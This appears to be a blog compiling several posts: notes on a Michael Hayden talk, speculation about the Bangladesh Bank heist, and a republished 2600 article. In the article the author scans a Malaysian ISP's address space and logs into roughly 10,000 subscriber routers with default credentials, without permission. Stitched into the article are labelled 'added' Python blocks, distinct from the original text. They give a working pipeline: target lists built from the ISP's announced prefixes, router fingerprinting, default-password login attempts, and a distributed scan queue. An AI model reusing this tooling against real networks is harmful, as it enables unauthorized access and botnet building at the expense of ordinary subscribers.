Michael Hayden on interesting points

Some interesting points:

  1. Non-nation state actors now pose a significant threat to nation states
  2. Historical threats usually associated with bad nation states can now be executed by non-nation states
  3. The Industrial Era was about the consolidation of power; in the past only the government could run something as complex as a phone network
  4. The Post-Industrial Era is about the decentralization of power: today, modern economies privatize and decentralize important things like the phone network. (my comment: The internet is the epitome of this, a fully decentralized network controlled by no single entity)
  5. American foreign policy, power projection and defence have been fully focused on hard power against nation states (hard power = men with guns)
  6. In order to address the threat of non-nation states, the US government has pivoted its attack vectors and tactics
    • Yesterday  : Killing someone from a foreign army in a designated war-zone
    • Today : Drone Strikes on enemy combatants that aren’t fully recognized
    • Yesterday  : Capturing Foreign combatants and imprisoning them
    • Today : Guantanamo
    • Yesterday : Intercepting enemy communications, disabling and sabotaging
    • Today : Programs that Edward Snowden revealed
    • (my comment: I don’t think the full surveillance of domestic internet traffic was a good idea)
  7. We’re seeing the melting down of the post-WW2 and post-WW1 global order, and maybe even the breakdown of Westphalian nation states… ISIS is a response to Westphalian ideas of separation of church and state.
  8. There is a fundamental similarity between what Christian Europe faced in the 16th-17th centuries and what the Middle East faces today: both sides are debating the relationship between religion and power.
  9. Christian Europe had the answer of separating them—we call this separation modern!
  10. There is no guarantee that Islam in the Middle East will come to the same conclusion, i.e. they may never become modern.
  11. Less important stuff about nuclear power, about how Russia is adopting a nuclear-first option and considering it de-escalatory. And Hayden doesn’t like the Iran deal, and is not a big fan of Pakistan.
  12. American foreign policy makers like Hayden are more concerned with Chinese failure than with Chinese success. Political, economic and social factors may hamper the growth of China, but a failure of the regime is going to be a massive problem for the world, while a success for China would have a relatively smaller impact that can easily be folded into the world order.
  13. The Chinese claims on the nine-dash line are a nationalistic approach to remedying the economic slowdown (Hayden’s opinion); what’s more interesting is that this is a diplomatic error, and ASEAN countries are running back to America to balance China’s power.
  14. Fundamentally though, China has no reason to be an enemy of the US
  15. His last slide on American foreign policy, the 4 different president types: as a fan of Wilson and a World War 1 history freak, that was awesome!! I think it is one of the best historically precise frameworks for understanding US foreign policy that isn’t based on just the last 20 years
  16. Only one country supports targeted killings by the US—Israel.

Anonymity and IP addresses


This week, I’ll put the final touches on my move from Malaysia to Singapore.

So, I felt it would be a good idea to read through some Singaporean tech articles to see how tech events played out on the little red dot, and offer some unsolicited and completely useless advice on them.

It wasn’t easy sifting through a boatload of gadget reviews masquerading as tech journalism (I guess some things are the same in every country), but underneath the hundreds of phone reviews and fibre broadband comparisons, I found an interesting little report on illegal downloads.

The Singapore Straits Times reports that:

A local law firm that started proceedings to go after illegal downloaders in Singapore on behalf of two Hollywood studios said it will cooperate with the local authorities to ensure no abuse of process.

It follows a rare intervention by the Attorney-General’s Chambers (AGC) in civil applications made by Samuel Seow Law Corp (SSLC) in the High Court last month.

“We will work with the local authorities to ensure that there will be no unnecessary alarm to consumers who receive the letters of demand we plan to send out,” Mr Samuel Seow, managing director of SSLC, told The Straits Times yesterday.

This is just a rehashed version of what happened last year in Singapore, when the same law firm went after downloaders of another movie; the difference is that this time they’ll be doing it under the watchful eyes of the AGC.

There is something to be said here about copyright-trolling, the abuse of power and the bullying tactics usually involved. But, we’ll leave that discussion for another day.

Today, I want to explore a little bit about anonymity and how many people have a mistaken notion about what it is.

Random thoughts

You’ve probably heard of the hackers who almost got away with $1 billion, only to be thwarted by a typo. (if it weren’t for those meddling keyboards!)

What you probably didn’t hear was that they had already wired $100 million to themselves, and are assumed to have pocketed anywhere from $21 million to $81 million in cold hard cash.

Sure, billions are more than millions, but a single hack that returns $21 million is a good payday by anyone’s standards.

The group managed to hack into the Bangladesh central bank and gained access to specific machines on its network. From there they sent payment instructions over the SWIFT network to transfer nearly $1 billion, all from a bank with just $28 billion in foreign exchange reserves.

These were not two-bit hackers foiled by a typo; this was a well-targeted attack that would probably have gone ahead even if the bank had upgraded its switches from $10 D-Links to $100,000 Cisco routers, and it wouldn’t have made a difference. The BAE report on the breach made for some interesting bedtime reading, but what really struck me was that the hackers were smart enough to suppress the printouts of confirmations, thereby ensuring no bank employee knew of the breach.

Each payment instruction generates a paper printout for employees to verify physically, but because that paper printout was generated by the same compromised software, it was trivial to suppress. A confirmation produced by the very system it is supposed to verify is not an independent control.

But hacking is one thing; knowing how to wire the money anonymously out of a heavily regulated banking system is another.

The hackers had figured out that the best way to smuggle out millions of dollars was via casinos in the Philippines, which weren’t covered by anti-money-laundering laws. This knowledge isn’t something that appears on last week’s Jeopardy or a question you pose on Reddit; it’s something only insiders know about.

Oh, and by the way, another $20 million was routed to Sri Lanka, suggesting there are other avenues to launder money out of the system from that Island nation as well.

But just who are these sophisticated hackers?

The Philippine senators who held a hearing on the incident suggested that the perpetrators ‘could’ be Chinese. And while there’s probably a conflict of interest in their statement (nobody wants to admit that there are criminals within their own borders), the evidence does seem to suggest it’s at least a likelihood.

And if I were to put on my tin-foil hat for a while, we may be able to correlate this attack with something that occurred late last year. Keep in mind though that this is venturing deep into crazy-cat-lady territory, and you have been warned.

So with that warning, let me take you back to good ol’ 2015.

In September of that year, President Obama and President Xi reached a ‘broad agreement’ that both nations would no longer hack each other for ‘commercial purposes’. Nation-state espionage and intelligence gathering was still OK, but intentionally targeting corporations for their intellectual property was not.

Of course, the agreement was a bit vague on specifics: if Chinese hackers were to target Lockheed Martin to obtain the designs for the F-35 fighter, would that be considered commercial?

But overall the agreement was clear that both countries would not use hacking to advance their commercial interests. Keep in mind that both countries vehemently denied they ever did this, so in essence the statement was merely formalizing something both countries had always denied doing: sort of saying “we promise never to do the things we never did in the first place”.

To give you a flavour of corporate espionage, I recommend reading a brilliant post titled “Stealing White” by Del Quentin Wilber at Bloomberg. It’s a long read (almost 4,000 words) about a Malaysian trying to steal the secrets of titanium dioxide production from DuPont. Apparently titanium dioxide makes a perfect white that is the envy of all other whites, and the plot to steal the manufacturing secrets of this perfect white is elaborate enough to make Wile E. Coyote green with envy; just like in the cartoons, it fails.

The Bloomberg piece concludes with an interesting point “the Chinese may have gotten what they needed directly from the chemical company. Newly filed court documents reveal that the FBI motel raid found evidence DuPont’s computers had been hacked.”

So elaborate espionage didn’t work as effectively as simply hacking into the source and taking it directly, and for a long time it was assumed that these breaches were executed by hackers from the Chinese government themselves. Think of it as a special arm dedicated to corporate espionage.

Of course, let me reiterate that this is merely hypothetical, and let’s also not forget that the Snowden leaks suggest the NSA was also in on the corporate espionage game, and spied on corporate entities like Brazil’s Petrobras.

And here’s where the tin-foil comes in.

If China did indeed have a corporate espionage arm (not saying they did), and that arm was disbanded back in September due to the agreement with the US, what would happen exactly?

Well, you’d think hundreds (if not thousands) of well-trained hackers who specialized in breaching corporate networks would soon be out of jobs. And since hacking, especially government-level hacking, isn’t exactly a generic skill set you can use to job-hop around, the most likely scenario is that these hackers soon become freelancers.

And freelancers sooner or later coalesce into well-organized teams with high levels of knowledge and expertise.

But what kind of heist could a group of well-trained, highly skilled, out of a job hackers do?

Hypothetically they could infiltrate a financial organization and start routing money to themselves, maybe? Identifying flaws in the global monetary system and using them to steal about $1 billion from a bank in Bangladesh?

Just maybe.

 

2600 article

*A republication of my article on 2600, a hacker magazine*

Greetings from Malaysia.

This is my first time writing to 2600, although I’ve been a Kindle subscriber for more than 2 years now.

For my first article, I hoped to write about a little hacking expedition I embarked on a couple of months back, to help me improve my coding skills as well as learn more about local internet users.

Malaysia got onto the internet scene much later than most developed countries; our first ISP was only founded in 1992, and even then it was pretty much exclusively dial-up. Soon the local telecom company, Telekom Malaysia (TM), got into the ISP business and basically killed every other player because, as the incumbent government-owned telecommunications company, it alone had access to the phone lines of every Malaysian household. Until very recently, phone lines in Malaysia were owned by the federal government through Telekom Malaysia, and it was only in the late 90’s that a privatisation plan opened that up.

During the days of dial-up over PSTN, and even after ADSL connectivity (which still ran over PSTN lines), TM held a monopoly over all internet subscribers in the country, simply because it owned the phone lines. Other ISPs struggled to penetrate the market, because their offerings couldn’t compete with the scale and unfair advantage of TM.

Fortunately, that all changed when TM was laying down fibre-optic cables. As part of a deal, TM secured a government subsidy to fund the fibre infrastructure but was forced to allow other ISPs to utilize the last mile. In theory this would have increased competition and provided a more level playing field, which it did. But TM was slow in opening up the last mile, and managed to get a head start of around 400,000 subscribers before any other ISP began to offer a fibre-to-the-home internet connection.

Why am I telling you this?

Because TM doesn’t really prioritize security, and I discovered a near-perfect storm of security lapses that may prove costly to TM at some point.

As a ‘legacy’ ISP in the country, TM was around when IP addresses were cheap and IPv4 exhaustion was a prediction, not a reality. Hence it managed to secure for itself nearly 2.5 million IP addresses from IANA. This abundance of IP addresses meant that TM gives all its customers a public-facing internet IP by default, something all other ISPs in Malaysia offer only on request of the subscriber. I won’t go into the details of NAT here, but you can Google it if you’re interested.

Secondly, as part of a fibre subscription, TM provides a modem and WiFi router, which is nothing out of the ordinary, except that TM sourced all its routers from just two manufacturers, and each manufacturer provided only one router model. From a security standpoint, having an entire population on a single device isn’t a good thing, because a single exploit could take them all out at once, akin to the super-viruses we hear about that could wipe out entire crops because there’s so little genetic biodiversity in industrial agriculture.

Thirdly, TM provides a TV box for free and paid channels streamed to your TV. The problem is that the TV box requires a complex VLAN segmentation and setup on the router, meaning most routers won’t support the TM fibre offering. This forced most (or all) TM subscribers to continue using whatever router TM provided them in the first place, without the ability to swap it for a more secure or feature-rich one.

All in all, this meant that all of TM’s 600,000 fibre subscribers (at the time of writing) were connected directly to the internet via a public IP, and most of them continued to use one of the two routers supplied by TM.

So far, nothing too exceptional here, except for two last bits. All the routers were configured to allow access from the WAN interface (i.e. you could configure the router from the internet), and all the routers were set up with one of five default username/password combinations. The default passwords (as you may have guessed) were rarely changed, and most users were left completely vulnerable to attack on a device they never even considered would be a target.

In 2007, while the fibre offering was still very new, several hackers in Malaysia alerted TM to the ‘flaw’ in their operating model, but TM maintained that the WAN interface was necessary for ‘maintenance and support’, although they did promise to change all passwords to a unique password per router. So here we are in 2015, and I wanted to see just how honest TM had been in keeping that promise.

First I had to get the list of IP addresses that belong to TM; a quick Google search revealed that TM was AS4788. AS stands for Autonomous System, a network (or group of networks) under a single administrative control, and the unit between which BGP routes. BGP is the Border Gateway Protocol, which defines how reachability for IP prefixes is exchanged between ASes, and the great thing about it is that all this information is public, meaning you can easily determine which prefixes TM announces and therefore which IP addresses are TM’s.
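As an added example (not code from the original article), this is how the prefix list for an ASN can be turned into a scan target list. It assumes the input is in the route-object format returned by an IRR query such as `whois -h whois.radb.net -- '-i origin AS4788'`; the sample text below is constructed, and its prefixes are RFC 5737 documentation ranges, not Telekom Malaysia’s real ones. Overlapping route objects are collapsed so that no address is scanned twice.

```python
"""Build a scan target list for one ASN from IRR route objects (IPv4 only)."""
import ipaddress
import re

# Constructed sample in the shape of `whois -h whois.radb.net -- '-i origin AS4788'`
# output. The prefixes are RFC 5737 documentation ranges, NOT TM's real ones.
SAMPLE_IRR_OUTPUT = """\
route:          192.0.2.0/24
descr:          constructed sample, not a real TM route
origin:         AS4788
source:         RADB

route:          198.51.100.0/24
origin:         as4788
source:         RADB

route:          203.0.113.0/25
origin:         AS64496
source:         RADB

route:          203.0.113.128/26
origin:         AS4788
source:         RADB

route:          192.0.2.0/25
origin:         AS4788
source:         RADB
"""

FIELD_RE = re.compile(r"^([A-Za-z0-9-]+):\s*(.*?)\s*$")


def parse_route_objects(irr_text, asn):
    """Return the de-duplicated IPv4 prefixes whose route object lists `asn` as origin.

    Duplicate and overlapping announcements are common in IRR data; collapsing
    them means each address is handed to the scanner exactly once.
    """
    asn = asn.upper()
    prefixes = []
    for block in re.split(r"\n\s*\n", irr_text.strip()):
        fields = {}
        for line in block.splitlines():
            m = FIELD_RE.match(line)
            if m:
                fields[m.group(1).lower()] = m.group(2)
        if fields.get("origin", "").upper() != asn or "route" not in fields:
            continue  # another ASN, or a route6: object
        try:
            prefixes.append(ipaddress.IPv4Network(fields["route"], strict=False))
        except ValueError:
            continue  # malformed prefix: skip it rather than abort the whole run
    return sorted(ipaddress.collapse_addresses(prefixes))


def count_hosts(prefixes):
    """Usable host addresses across the prefixes (network/broadcast excluded)."""
    return sum(p.num_addresses - 2 if p.prefixlen < 31 else p.num_addresses
               for p in prefixes)


def iter_hosts(prefixes):
    """Yield every host address as a string; these feed the port scanner."""
    for p in prefixes:
        for host in p.hosts():
            yield str(host)


if __name__ == "__main__":
    nets = parse_route_objects(SAMPLE_IRR_OUTPUT, "AS4788")
    print(nets, count_hosts(nets))
```

Route objects in an IRR are registered by the network operator and can be stale, so for a live run it is worth cross-checking against what is actually announced in BGP (a looking glass, or a RIPE RIS / RouteViews dump) before trusting the list.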

Once I had the list of IP addresses I quickly created a Python script to loop through each individual IP and determine the HTTP header of the end device on that IP (if there was one in the first place). I queried only port 8080, to save time. Since TM had only two router models, it was pretty trivial to validate the HTTP header and see if the IP was hosting a vulnerable TM router. A more professional approach would be to use zmap or Shodan, but creating your own scripts to do this has its advantages in learning.

IP scanning was easy, and determining if a particular router was indeed on port 8080 of a specific IP address wasn’t a tall hurdle to cross. The much harder part was to actually test the hypothesis that most of the routers still used the default usernames and passwords. This meant I had to actually POST data via HTTP to the page from my Python script. This isn’t usually a difficult task, but the routers themselves ran a large amount of JavaScript, and that just threw my Python scripts into a tailspin.

Try as I might, I couldn’t get it working using just Python. Eventually I gave up trying to navigate the router’s homepage, but then I found Selenium.

Selenium is a tool that allows you to “create robust, browser-based regression automation suites and tests”; in other words, Selenium allows you to control a browser like Firefox or Chrome from a Python script. This was the holy grail, because the web browser would take care of all the JavaScript nastiness for me, and now I could go deeper into the router configuration settings and poke around to determine other things, like whether people even bother to change their WiFi SSID and password.

But Selenium has a performance drawback: a single Python script querying a webpage takes a couple of MB of RAM, but an entire instance of Firefox kept open could consume a few hundred megabytes, which severely limited my ability to scale the scanning. Even after discovering the tool, I tried to go back to just native Python, but that JavaScript stuff just threw me off.

Eventually, I wrote a whole script in Python that would scan an IP range, determine if a router was present at the end of the IP (on port 8080), and then pass that to another script that would use Selenium to drive a Firefox browser to visit the router’s webpage, try the handful of default username/passwords and determine if any of them worked. And they DID!!
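The scan-then-try-defaults pipeline described above, as an added example that is not the author’s script. The router models, Server banners and credential pairs are hypothetical placeholders (the article does not name them), and it assumes the management page uses HTTP Basic auth and answers 200 on success; a JavaScript-driven login form needs a real browser, which is exactly why the author ended up with Selenium. A constructed in-memory network is included so the block runs offline; `http_request` is the real-socket version you would pass for a live run, and only against addresses you are authorized to test.

```python
"""Fingerprint web-managed routers on port 8080 and test them for default credentials."""
import base64
import concurrent.futures
import http.client

PORT = 8080
TIMEOUT = 3.0  # seconds; most of the address space simply never answers

# Hypothetical placeholders: the article does not name the two router models or
# the five default username/password pairs, so these stand in for them.
KNOWN_SERVER_BANNERS = {
    "ExampleRouterA/1.0": "model-A",
    "ExampleRouterB/2.3": "model-B",
}
DEFAULT_CREDS = [("admin", "admin"), ("admin", "password"), ("user", "user")]


def http_request(host, path="/", auth=None, port=PORT, timeout=TIMEOUT):
    """One HTTP GET. Returns (status, lower-cased headers) or None if unreachable."""
    headers = {"User-Agent": "router-audit/0.1"}
    if auth is not None:
        token = base64.b64encode(f"{auth[0]}:{auth[1]}".encode()).decode()
        headers["Authorization"] = "Basic " + token
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers=headers)
        resp = conn.getresponse()
        resp.read()  # drain the body so the connection closes cleanly
        return resp.status, {k.lower(): v for k, v in resp.getheaders()}
    except (OSError, http.client.HTTPException):
        return None
    finally:
        conn.close()


def fingerprint(response):
    """Map a probe response to a router model via its Server header, else None."""
    if response is None:
        return None
    _status, headers = response
    banner = headers.get("server", "")
    for needle, model in KNOWN_SERVER_BANNERS.items():
        if needle in banner:
            return model
    return None


def check_host(host, request=http_request):
    """Is this a known router, and does one of the default pairs log in?

    Assumes HTTP Basic auth with 200 on success. Anything that is not a known
    router is never sent credentials at all.
    """
    model = fingerprint(request(host))
    if model is None:
        return {"host": host, "model": None, "weak_creds": None}
    for cred in DEFAULT_CREDS:
        resp = request(host, auth=cred)
        if resp is not None and resp[0] == 200:
            return {"host": host, "model": model, "weak_creds": cred}
    return {"host": host, "model": model, "weak_creds": None}


def audit(hosts, request=http_request, workers=64):
    """Probe many hosts concurrently; results come back in input order."""
    with concurrent.futures.ThreadPoolExecutor(max_workers=workers) as pool:
        return list(pool.map(lambda h: check_host(h, request), hosts))


# Constructed stand-in for the network so the block runs offline:
# host -> (Server banner, the credential pair the device actually accepts).
FAKE_NETWORK = {
    "192.0.2.10": ("ExampleRouterA/1.0", ("admin", "admin")),  # still on defaults
    "192.0.2.11": ("ExampleRouterB/2.3", ("s3cret", "x")),     # owner changed it
    "192.0.2.12": ("nginx/1.18.0", None),                      # not a router at all
}


def fake_request(host, path="/", auth=None, **_):
    """Same contract as http_request, served from FAKE_NETWORK instead of a socket."""
    entry = FAKE_NETWORK.get(host)
    if entry is None:
        return None  # nothing listening on 8080
    banner, accepted = entry
    headers = {"server": banner}
    if accepted is None or auth == accepted:
        return 200, headers
    return 401, headers


if __name__ == "__main__":
    targets = ["192.0.2.10", "192.0.2.11", "192.0.2.12", "192.0.2.13"]
    for result in audit(targets, request=fake_request):
        print(result)
```

The same `check_host` is the test a subscriber can run against their own public IP from outside their network: if it returns a model, the WAN-side admin page is exposed; if it also returns `weak_creds`, the password is still the default.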

Of course, while I was in, I poked around to determine things like WiFi SSIDs, etc., but mostly for fun, and I made it a point not to change any setting on the router.

But there’s no way I could scale all of this on my home PC, or even my laptop. So, I decided to host this in the cloud, and chose to use Amazon, specifically a Windows instance on Amazon.

Initially, I decided to host this in Singapore, which made sense since I was visiting Malaysian IPs, but then I realized that Amazon’s Oregon data center had much cheaper rates than the Singapore one, so I changed my decision and hosted in Oregon instead. In some cases this was a 20% reduction in cost, at the expense of ‘slightly’ more latency, but my application wasn’t latency-sensitive so much as I was price-sensitive 🙂

Then, in true cheapskate fashion, I decided to toy with Amazon spot instances: this is a special deal from Amazon where they lease unutilized machines to the highest bidder, and you can get this for nearly 50% of the price of the ‘on-demand’ Amazon instance. The only downside is that Amazon reserves the right to terminate your instance at any time, but from my experience of using this, and from the blogs I read, the chances of that happening were pretty slim.

I’ve run nearly 10 of these so far, and every time I spin up a spot instance, it’s never been auto-terminated. Pretty decent deal; the only real downside is that a spot instance usually takes about 3-5 minutes to launch, due to the bid processing. But other than that it’s as good as an on-demand instance 🙂

With a very powerful Amazon instance that had a large amount of RAM, I could spin up a large number of instances of Firefox to do my bidding. Using a simple database to ensure all the instances weren’t visiting the same IP addresses, I was able to automate the whole process of ‘visiting’ TM routers with ease.

Eventually, a single large Amazon instance (procured through the spot-instance method) was able to hack through 10,000 routers in less than 12 hours for under $10.00. Quite a good return on investment if you’re looking to create your own little botnet army.

TM have especially dropped the ball here; they now have at least 10,000 vulnerable routers floating on their network, waiting to be owned by the next Lizard Squad characters. I could easily have configured my script to turn off the WAN interface on the router, to limit people’s exposure, but I thought better of making changes on a host system without the owner’s explicit permission.

Hopefully, if you’re from Malaysia and a TM subscriber, now you know, and you can check your own router yourself.
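An added example of the “simple database” coordination step, not the author’s code: a SQLite work queue from which each Firefox worker atomically claims a batch of IPs, so two workers never visit the same address. It also handles the spot-instance failure mode the author mentions: a worker that is terminated mid-batch never reports back, so its stale claims are returned to the pool. The ten addresses in `demo()` are constructed from an RFC 5737 range.

```python
"""Hand out scan targets to many workers so no IP is visited twice."""
import os
import sqlite3
import tempfile
import time

SCHEMA = """
CREATE TABLE IF NOT EXISTS targets (
    ip         TEXT PRIMARY KEY,
    state      TEXT NOT NULL DEFAULT 'pending',   -- pending | claimed | done
    worker     TEXT,
    claimed_at REAL,
    result     TEXT
);
CREATE INDEX IF NOT EXISTS targets_state ON targets(state);
"""


def open_db(path):
    """One connection per worker. Autocommit mode, so transactions are explicit."""
    db = sqlite3.connect(path, timeout=30, isolation_level=None)
    db.execute("PRAGMA journal_mode=WAL")  # readers never block the single writer
    db.executescript(SCHEMA)
    return db


def load_targets(db, ips):
    """Seed the queue; re-running with the same IPs is harmless."""
    db.execute("BEGIN")
    db.executemany("INSERT OR IGNORE INTO targets(ip) VALUES (?)", [(ip,) for ip in ips])
    db.execute("COMMIT")


def claim(db, worker, n=100):
    """Atomically take up to n pending IPs for this worker.

    BEGIN IMMEDIATE takes the write lock before the SELECT, so two workers
    cannot both read the same pending rows and then both mark them claimed.
    """
    db.execute("BEGIN IMMEDIATE")
    try:
        ips = [row[0] for row in db.execute(
            "SELECT ip FROM targets WHERE state = 'pending' LIMIT ?", (n,))]
        db.executemany(
            "UPDATE targets SET state = 'claimed', worker = ?, claimed_at = ? WHERE ip = ?",
            [(worker, time.time(), ip) for ip in ips])
        db.execute("COMMIT")
    except Exception:
        db.execute("ROLLBACK")
        raise
    return ips


def finish(db, ip, result):
    """Record the outcome for one IP; the row leaves the pool for good."""
    db.execute("UPDATE targets SET state = 'done', result = ? WHERE ip = ?", (result, ip))


def requeue_stale(db, max_age, now=None):
    """Return claims older than max_age seconds to the pool.

    A spot instance terminated mid-batch never calls finish(); a periodic sweep
    with this function makes its IPs available again. Returns the rows requeued.
    """
    cutoff = (now if now is not None else time.time()) - max_age
    cur = db.execute(
        "UPDATE targets SET state = 'pending', worker = NULL, claimed_at = NULL "
        "WHERE state = 'claimed' AND claimed_at < ?", (cutoff,))
    return cur.rowcount


def demo():
    """Two workers sharing one queue of ten constructed (RFC 5737) addresses."""
    path = os.path.join(tempfile.mkdtemp(), "scan.db")
    a, b = open_db(path), open_db(path)
    load_targets(a, [f"192.0.2.{i}" for i in range(1, 11)])
    got_a = claim(a, "worker-a", 6)
    got_b = claim(b, "worker-b", 6)  # only four are left for the second worker
    for ip in got_a:
        finish(a, ip, "checked")
    # Pretend worker-b died: a sweep ten minutes later returns its claims.
    requeued = requeue_stale(a, max_age=300, now=time.time() + 600)
    pending = a.execute("SELECT COUNT(*) FROM targets WHERE state = 'pending'").fetchone()[0]
    a.close()
    b.close()
    return {"a": got_a, "b": got_b, "overlap": set(got_a) & set(got_b),
            "requeued": requeued, "pending": pending}


if __name__ == "__main__":
    print(demo())
```

A file-backed SQLite queue is enough when all the workers run on one large instance, as in the article. Once the workers are spread across several spot instances the queue has to live on a network database; the claim step is the same idea there, and PostgreSQL expresses it directly with `SELECT … FOR UPDATE SKIP LOCKED`.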

Selamat Tinggal from Malaysia.